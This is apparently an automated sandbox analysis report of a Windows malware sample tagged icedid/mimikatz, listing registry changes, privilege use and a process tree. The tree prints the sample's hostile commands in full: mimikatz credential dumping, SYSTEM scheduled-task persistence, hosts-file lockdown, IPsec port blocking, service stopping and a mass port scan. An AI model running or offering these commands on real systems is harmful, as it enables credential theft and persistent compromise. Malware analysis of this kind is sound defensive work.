Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qugzbwz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslfoo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-12-30_0ec4721a52295127e942ed5415bb7270_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qugzbwz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4076 cmd.exe 1464 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000a000000023b7c-5.dat nsis_installer_2 behavioral2/files/0x000a000000023b83-15.dat nsis_installer_1 behavioral2/files/0x000a000000023b83-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" qugzbwz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" qugzbwz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ qugzbwz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing qugzbwz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" qugzbwz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" qugzbwz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing uyllzzcqz.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" qugzbwz.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1464 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3728 schtasks.exe 2456 schtasks.exe 4500 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1428 2024-12-30_0ec4721a52295127e942ed5415bb7270_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1428 2024-12-30_0ec4721a52295127e942ed5415bb7270_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3620 qugzbwz.exe Token: SeDebugPrivilege 4792 qugzbwz.exe Token: SeDebugPrivilege 3032 vfshost.exe Token: SeDebugPrivilege 4316 uyllzzcqz.exe Token: SeLockMemoryPrivilege 116 gtnnts.exe Token: SeLockMemoryPrivilege 116 gtnnts.exe Token: SeDebugPrivilege 2256 uyllzzcqz.exe Token: SeDebugPrivilege 1404 uyllzzcqz.exe Token: SeDebugPrivilege 4892 uyllzzcqz.exe Token: SeDebugPrivilege 4800 uyllzzcqz.exe Token: SeDebugPrivilege 3944 uyllzzcqz.exe Token: SeDebugPrivilege 4436 uyllzzcqz.exe Token: SeDebugPrivilege 5108 uyllzzcqz.exe Token: SeDebugPrivilege 4320 uyllzzcqz.exe Token: SeDebugPrivilege 3712 uyllzzcqz.exe Token: SeDebugPrivilege 2696 uyllzzcqz.exe Token: SeDebugPrivilege 4968 uyllzzcqz.exe Token: SeDebugPrivilege 2288 uyllzzcqz.exe Token: SeDebugPrivilege 2812 uyllzzcqz.exe Token: SeDebugPrivilege 4472 uyllzzcqz.exe Token: SeDebugPrivilege 4180 uyllzzcqz.exe Token: SeDebugPrivilege 4136 uyllzzcqz.exe Token: SeDebugPrivilege 4172 uyllzzcqz.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 1428 2024-12-30_0ec4721a52295127e942ed5415bb7270_hacktools_icedid_mimikatz.exe 1428 2024-12-30_0ec4721a52295127e942ed5415bb7270_hacktools_icedid_mimikatz.exe 3620 qugzbwz.exe 3620 qugzbwz.exe 4792 qugzbwz.exe 4792 qugzbwz.exe 2860 xohudmc.exe 5020 nslfoo.exe 432 qugzbwz.exe 432 qugzbwz.exe 5048 qugzbwz.exe 5048 qugzbwz.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1428 wrote to memory of 4076 1428 2024-12-30_0ec4721a52295127e942ed5415bb7270_hacktools_icedid_mimikatz.exe 83 PID 1428 wrote to memory of 4076 1428 2024-12-30_0ec4721a52295127e942ed5415bb7270_hacktools_icedid_mimikatz.exe 83 PID 1428 wrote to memory of 4076 1428 2024-12-30_0ec4721a52295127e942ed5415bb7270_hacktools_icedid_mimikatz.exe 83 PID 4076 wrote to memory of 1464 4076 cmd.exe 85 PID 4076 wrote to memory of 1464 4076 cmd.exe 85 PID 4076 wrote to memory of 1464 4076 cmd.exe 85 PID 4076 wrote to memory of 3620 4076 cmd.exe 87 PID 4076 wrote to memory of 3620 4076 cmd.exe 87 PID 4076 wrote to memory of 3620 4076 cmd.exe 87 PID 4792 wrote to memory of 4892 4792 qugzbwz.exe 89 PID 4792 wrote to memory of 4892 4792 qugzbwz.exe 89 PID 4792 wrote to memory of 4892 4792 qugzbwz.exe 89 PID 4892 wrote to memory of 1592 4892 cmd.exe 91 PID 4892 wrote to memory of 1592 4892 cmd.exe 91 PID 4892 wrote to memory of 1592 4892 cmd.exe 91 PID 4892 wrote to memory of 1328 4892 cmd.exe 92 PID 4892 wrote to memory of 1328 4892 cmd.exe 92 PID 4892 wrote to memory of 1328 4892 cmd.exe 92 PID 4892 wrote to memory of 384 4892 cmd.exe 93 PID 4892 wrote to memory of 384 4892 cmd.exe 93 PID 4892 wrote to memory of 384 4892 cmd.exe 93 PID 4892 wrote to memory of 1160 4892 cmd.exe 94 PID 4892 wrote to memory of 1160 4892 cmd.exe 94 PID 4892 wrote to memory of 1160 4892 cmd.exe 94 PID 4892 wrote to memory of 1036 4892 cmd.exe 95 PID 4892 wrote to memory of 1036 4892 cmd.exe 95 PID 4892 wrote to memory of 1036 4892 cmd.exe 95 PID 4892 wrote to memory of 1732 4892 cmd.exe 96 PID 4892 wrote to memory of 1732 4892 cmd.exe 96 PID 4892 wrote to memory of 1732 4892 cmd.exe 96 PID 4792 wrote to memory of 4992 4792 qugzbwz.exe 98 PID 4792 wrote to memory of 4992 4792 qugzbwz.exe 98 PID 4792 wrote to memory of 4992 4792 qugzbwz.exe 98 PID 4792 wrote to memory of 4436 4792 qugzbwz.exe 100 PID 4792 wrote to memory of 4436 4792 qugzbwz.exe 100 PID 4792 wrote to memory of 4436 4792 qugzbwz.exe 100 PID 4792 wrote to memory of 4728 4792 qugzbwz.exe 102 PID 4792 wrote to memory of 4728 4792 qugzbwz.exe 102 PID 4792 wrote to memory of 4728 4792 qugzbwz.exe 102 PID 4792 wrote to memory of 1204 4792 qugzbwz.exe 106 PID 4792 wrote to memory of 1204 4792 qugzbwz.exe 106 PID 4792 wrote to memory of 1204 4792 qugzbwz.exe 106 PID 1204 wrote to memory of 2352 1204 cmd.exe 108 PID 1204 wrote to memory of 2352 1204 cmd.exe 108 PID 1204 wrote to memory of 2352 1204 cmd.exe 108 PID 2352 wrote to memory of 4496 2352 wpcap.exe 109 PID 2352 wrote to memory of 4496 2352 wpcap.exe 109 PID 2352 wrote to memory of 4496 2352 wpcap.exe 109 PID 4496 wrote to memory of 1312 4496 net.exe 111 PID 4496 wrote to memory of 1312 4496 net.exe 111 PID 4496 wrote to memory of 1312 4496 net.exe 111 PID 2352 wrote to memory of 1896 2352 wpcap.exe 112 PID 2352 wrote to memory of 1896 2352 wpcap.exe 112 PID 2352 wrote to memory of 1896 2352 wpcap.exe 112 PID 1896 wrote to memory of 936 1896 net.exe 114 PID 1896 wrote to memory of 936 1896 net.exe 114 PID 1896 wrote to memory of 936 1896 net.exe 114 PID 2352 wrote to memory of 4696 2352 wpcap.exe 115 PID 2352 wrote to memory of 4696 2352 wpcap.exe 115 PID 2352 wrote to memory of 4696 2352 wpcap.exe 115 PID 4696 wrote to memory of 536 4696 net.exe 118 PID 4696 wrote to memory of 536 4696 net.exe 118 PID 4696 wrote to memory of 536 4696 net.exe 118 PID 2352 wrote to memory of 4464 2352 wpcap.exe 121
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2168
-
C:\Windows\TEMP\kqpfindzy\gtnnts.exe"C:\Windows\TEMP\kqpfindzy\gtnnts.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:116
-
-
C:\Users\Admin\AppData\Local\Temp\2024-12-30_0ec4721a52295127e942ed5415bb7270_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-12-30_0ec4721a52295127e942ed5415bb7270_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1428 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\etekeszy\qugzbwz.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1464
-
-
C:\Windows\etekeszy\qugzbwz.exeC:\Windows\etekeszy\qugzbwz.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3620
-
-
-
C:\Windows\etekeszy\qugzbwz.exeC:\Windows\etekeszy\qugzbwz.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1592
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:1328
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:384
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:1160
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1036
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:1732
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4992
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4436
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4728
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\epkuieeth\uybmnnqef\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\epkuieeth\uybmnnqef\wpcap.exeC:\Windows\epkuieeth\uybmnnqef\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1312
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:936
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:4696 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:536
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:4464 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:4988
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3420 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2772
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1924
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3696 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:3340 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2256
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\epkuieeth\uybmnnqef\ttpfdpuzu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\epkuieeth\uybmnnqef\Scant.txt2⤵PID:4492
-
C:\Windows\epkuieeth\uybmnnqef\ttpfdpuzu.exeC:\Windows\epkuieeth\uybmnnqef\ttpfdpuzu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\epkuieeth\uybmnnqef\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3100
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\epkuieeth\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\epkuieeth\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1152 -
C:\Windows\epkuieeth\Corporate\vfshost.exeC:\Windows\epkuieeth\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zitbhebcd" /ru system /tr "cmd /c C:\Windows\ime\qugzbwz.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4484 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4472
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "zitbhebcd" /ru system /tr "cmd /c C:\Windows\ime\qugzbwz.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4500
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "etgzykkqn" /ru system /tr "cmd /c echo Y|cacls C:\Windows\etekeszy\qugzbwz.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2680 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "etgzykkqn" /ru system /tr "cmd /c echo Y|cacls C:\Windows\etekeszy\qugzbwz.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yzcateluu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\kqpfindzy\gtnnts.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2692 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1044
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "yzcateluu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\kqpfindzy\gtnnts.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2456
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:640
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4100
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1516
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
